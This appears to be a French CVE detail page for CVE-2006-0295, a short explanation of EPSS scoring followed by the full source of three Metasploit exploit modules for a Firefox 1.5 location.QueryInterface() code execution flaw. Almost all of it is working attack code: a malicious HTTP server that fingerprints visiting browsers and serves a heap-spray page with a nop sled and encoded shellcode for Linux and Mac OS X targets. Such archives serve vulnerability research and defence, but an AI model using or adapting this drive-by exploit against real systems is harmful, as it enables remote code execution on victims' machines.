CVE-2006-0295 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::firefox_queryinterface_linux; use strict; use base "Msf::Exploit"; use Pex::Text; use IO::Socket::INET; use IPC::Open3; my $advanced = { 'Gzip' => [1, 'Enable gzip content encoding'], 'Chunked' => [1, 'Enable chunked transfer encoding'], }; my $info = { 'Name' => 'Firefox location.QueryInterface() Code Execution (Linux x86)', 'Version' => '$Revision: 1.1 $', 'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ], 'Description' => Pex::Text::Freeform(qq{ This module exploits a code execution vulnerability in the Mozilla Firefox browser. To reliably exploit this vulnerability, we need to fill almost a gigabyte of memory with our nop sled and payload. This module has been tested on Gentoo Linux with the stock Firefox 1.5.0 package. }), 'Arch' => [ 'x86' ], 'OS' => [ 'linux' ], 'Priv' => 0, 'UserOpts' => { 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", 'Keys' => ['-bind'], }, 'Refs' => [ ['CVE', '2006-0295'], ['BID', '16476'], ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'], ], 'DefaultTarget' => 0, 'Targets' => [ [ 'Mozilla Firefox 1.5.0.0 on Linux x86' ] ], 'Keys' => [ 'mozilla' ], 'DisclosureDate' => 'Feb 02 2006', }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $server = IO::Socket::INET->new( LocalHost => $self->GetVar('HTTPHOST'), LocalPort => $self->GetVar('HTTPPORT'), ReuseAddr => 1, Listen => 1, Proto => 'tcp' ); my $client; # Did the listener create fail? if (not defined($server)) { $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); return; } my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? Pex::Utils::SourceIP('1.2.3.4') : $self->GetVar('HTTPHOST'); $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/"); while (defined($client = $server->accept())) { $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); } return; } sub HandleHttpClient { my $self = shift; my $fd = shift; # Set the remote host information my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); # Read the HTTP command my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3); my $agent; # Read in the HTTP headers while ((my $line = $fd->RecvLine(10))) { $line =~ s/^\s+|\s+$//g; my ($var, $val) = split(/\:/, $line, 2); # Break out if we reach the end of the headers last if (not defined($var) or not defined($val)); $agent = $val if $var =~ /User-Agent/i; } my $os = 'Unknown'; my $vl = ($agent =~ m/\/1\.5$/) ? 'Vulnerable' : 'Not Vulnerable'; $os = 'Linux' if $agent =~ /Linux/i; $os = 'Mac OS X' if $agent =~ /OS X/i; $os = 'Windows' if $agent =~ /Windows/i; $self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl)."); if ($os ne 'Linux') { $self->PrintLine("[*] Invalid target for this exploit, trying anyways..."); } else { $self->PrintLine("[*] Sending payload and waiting for execution..."); } my $res = $fd->Send($self->BuildResponse($self->GenerateHTML())); $fd->Close(); } sub JSUnescape { my $self = shift; my $data = shift; my $code = ''; # Encode the shellcode via %u sequences for JS's unescape() function my $idx = 0; while ($idx < length($data) - 1) { my $c1 = ord(substr($data, $idx, 1)); my $c2 = ord(substr($data, $idx+1, 1)); $code .= sprintf('%%u%.2x%.2x', $c2, $c1); $idx += 2; } return $code; } sub GenerateHTML { my $self = shift; my $target = $self->Targets->[$self->GetVar('TARGET')]; my $shellcode = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload); my $data = qq# <html> <head> <title>One second please...</title> <script language="javascript"> function BodyOnLoad() { h = FillHeap(); location.QueryInterface(eval("Components.interfaces.nsIClassInfo")); }; function FillHeap() { // Filler var m = ""; var h = ""; var a = 0; // Nop sled for(a=0; a<(1024*512); a++) m += unescape("\%u9090"); // Payload m += unescape("$shellcode"); // Repeat for(a=0; a<1024; a++) h += m; // Return return h; } </script> </head> <body onload="BodyOnLoad()"> </body> </html> #; return $data; } sub BuildResponse { my ($self, $content) = @_; my $response = "HTTP/1.1 200 OK\r\n" . "Content-Type: text/html\r\n"; if ($self->GetVar('Gzip')) { $response .= "Content-Encoding: gzip\r\n"; $content = $self->Gzip($content); } if ($self->GetVar('Chunked')) { $response .= "Transfer-Encoding: chunked\r\n"; $content = $self->Chunk($content); } else { $response .= 'Content-Length: ' . length($content) . "\r\n" . "Connection: close\r\n"; } $response .= "\r\n" . $content; return $response; } sub Chunk { my ($self, $content) = @_; my $chunked; while (length($content)) { my $chunk = substr($content, 0, int(rand(10) + 1), ''); $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; } $chunked .= "0\r\n\r\n"; return $chunked; } sub Gzip { my $self = shift; my $data = shift; my $comp = int(rand(5))+5; my($wtr, $rdr, $err); my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); print $wtr $data; close ($wtr); local $/; return (<$rdr>); } 1; # milw0rm.com [2006-02-07]

## # $Id: firefox_queryinterface.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Firefox location.QueryInterface() Code Execution', 'Description' => %q{ This module exploits a code execution vulnerability in the Mozilla Firefox browser. To reliably exploit this vulnerability, we need to fill almost a gigabyte of memory with our nop sled and payload. This module has been tested on OS X 10.3 with the stock Firefox 1.5.0 package. }, 'License' => MSF_LICENSE, 'Author' => ['hdm'], 'Version' => '$Revision: 10394 $', 'References' => [ ['CVE', '2006-0295'], ['OSVDB', '22893'], ['BID', '16476'], ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'], ], 'Payload' => { 'Space' => 1000 + (rand(256).to_i * 4), 'BadChars' => "\x00", }, 'Targets' => [ [ 'Firefox 1.5.0.0 Mac OS X', { 'Platform' => 'osx', 'Arch' => ARCH_PPC } ], [ 'Firefox 1.5.0.0 Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DisclosureDate' => 'Feb 02 2006' )) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) handler(cli) end def generate_html(payload) enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch)) return <<-EOF <html> <head> <title>One second please...</title> <script language="javascript"> function BodyOnLoad() { h = FillHeap(); location.QueryInterface(eval("Components.interfaces.nsIClassInfo")); }; function FillHeap() { // Filler var m = ""; var h = ""; var a = 0; // Nop sled for(a=0; a<(1024*256); a++) m += unescape("#{enc_nops}"); // Payload m += unescape("#{enc_code}"); // Repeat for(a=0; a<1024; a++) h += m; // Return return h; } </script> </head> <body onload="BodyOnLoad()"> </body> </html> EOF end end

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::firefox_queryinterface_osx; use strict; use base "Msf::Exploit"; use Pex::Text; use IO::Socket::INET; use IPC::Open3; my $advanced = { 'Gzip' => [1, 'Enable gzip content encoding'], 'Chunked' => [1, 'Enable chunked transfer encoding'], }; my $info = { 'Name' => 'Firefox location.QueryInterface() Code Execution (Mac OS X)', 'Version' => '$Revision: 1.1 $', 'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ], 'Description' => Pex::Text::Freeform(qq{ This module exploits a code execution vulnerability in the Mozilla Firefox browser. To reliably exploit this vulnerability, we need to fill almost a gigabyte of memory with our nop sled and payload. This module has been tested on OS X 10.3 with the stock Firefox 1.5.0 package. }), 'Arch' => [ 'ppc' ], 'OS' => [ 'osx' ], 'Priv' => 0, 'UserOpts' => { 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", 'Keys' => ['-bind'], }, 'Refs' => [ ['CVE', '2006-0295'], ['BID', '16476'], ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'], ], 'DefaultTarget' => 0, 'Targets' => [ [ 'Mozilla Firefox 1.5.0.0 on Mac OS X' ] ], 'Keys' => [ 'mozilla' ], 'DisclosureDate' => 'Feb 02 2006', }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $server = IO::Socket::INET->new( LocalHost => $self->GetVar('HTTPHOST'), LocalPort => $self->GetVar('HTTPPORT'), ReuseAddr => 1, Listen => 1, Proto => 'tcp' ); my $client; # Did the listener create fail? if (not defined($server)) { $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); return; } my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? Pex::Utils::SourceIP('1.2.3.4') : $self->GetVar('HTTPHOST'); $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/"); while (defined($client = $server->accept())) { $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); } return; } sub HandleHttpClient { my $self = shift; my $fd = shift; # Set the remote host information my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); # Read the HTTP command my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3); my $agent; # Read in the HTTP headers while ((my $line = $fd->RecvLine(10))) { $line =~ s/^\s+|\s+$//g; my ($var, $val) = split(/\:/, $line, 2); # Break out if we reach the end of the headers last if (not defined($var) or not defined($val)); $agent = $val if $var =~ /User-Agent/i; } my $os = 'Unknown'; my $vl = ($agent =~ m/\/1\.5$/) ? 'Vulnerable' : 'Not Vulnerable'; $os = 'Linux' if $agent =~ /Linux/i; $os = 'Mac OS X' if $agent =~ /OS X/i; $os = 'Windows' if $agent =~ /Windows/i; $self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl)."); if ($os ne 'Mac OS X') { $self->PrintLine("[*] Invalid target for this exploit, trying anyways..."); } else { $self->PrintLine("[*] Sending payload and waiting for execution..."); } my $res = $fd->Send($self->BuildResponse($self->GenerateHTML())); $fd->Close(); } sub JSUnescapePPC { my $self = shift; my $data = shift; my $code = ''; # Encode the shellcode via %u sequences for JS's unescape() function my $idx = 0; while ($idx < length($data) - 1) { my $c1 = ord(substr($data, $idx, 1)); my $c2 = ord(substr($data, $idx+1, 1)); $code .= sprintf('%%u%.2x%.2x', $c1, $c2); $idx += 2; } return $code; } sub GenerateHTML { my $self = shift; my $target = $self->Targets->[$self->GetVar('TARGET')]; my $shellcode = $self->JSUnescapePPC($self->GetVar('EncodedPayload')->Payload); my $data = qq# <html> <head> <title>One second please...</title> <script language="javascript"> function BodyOnLoad() { h = FillHeap(); location.QueryInterface(eval("Components.interfaces.nsIClassInfo")); }; function FillHeap() { // Filler var m = ""; var h = ""; var a = 0; // Nop sled for(a=0; a<(1024*256); a++) m += unescape("\%u6060\%u6060"); // Payload m += unescape("$shellcode"); // Repeat for(a=0; a<1024; a++) h += m; // Return return h; } </script> </head> <body onload="BodyOnLoad()"> </body> </html> #; return $data; } sub BuildResponse { my ($self, $content) = @_; my $response = "HTTP/1.1 200 OK\r\n" . "Content-Type: text/html\r\n"; if ($self->GetVar('Gzip')) { $response .= "Content-Encoding: gzip\r\n"; $content = $self->Gzip($content); } if ($self->GetVar('Chunked')) { $response .= "Transfer-Encoding: chunked\r\n"; $content = $self->Chunk($content); } else { $response .= 'Content-Length: ' . length($content) . "\r\n" . "Connection: close\r\n"; } $response .= "\r\n" . $content; return $response; } sub Chunk { my ($self, $content) = @_; my $chunked; while (length($content)) { my $chunk = substr($content, 0, int(rand(10) + 1), ''); $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; } $chunked .= "0\r\n\r\n"; return $chunked; } sub Gzip { my $self = shift; my $data = shift; my $comp = int(rand(5))+5; my($wtr, $rdr, $err); my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); print $wtr $data; close ($wtr); local $/; return (<$rdr>); } 1; # milw0rm.com [2006-02-08]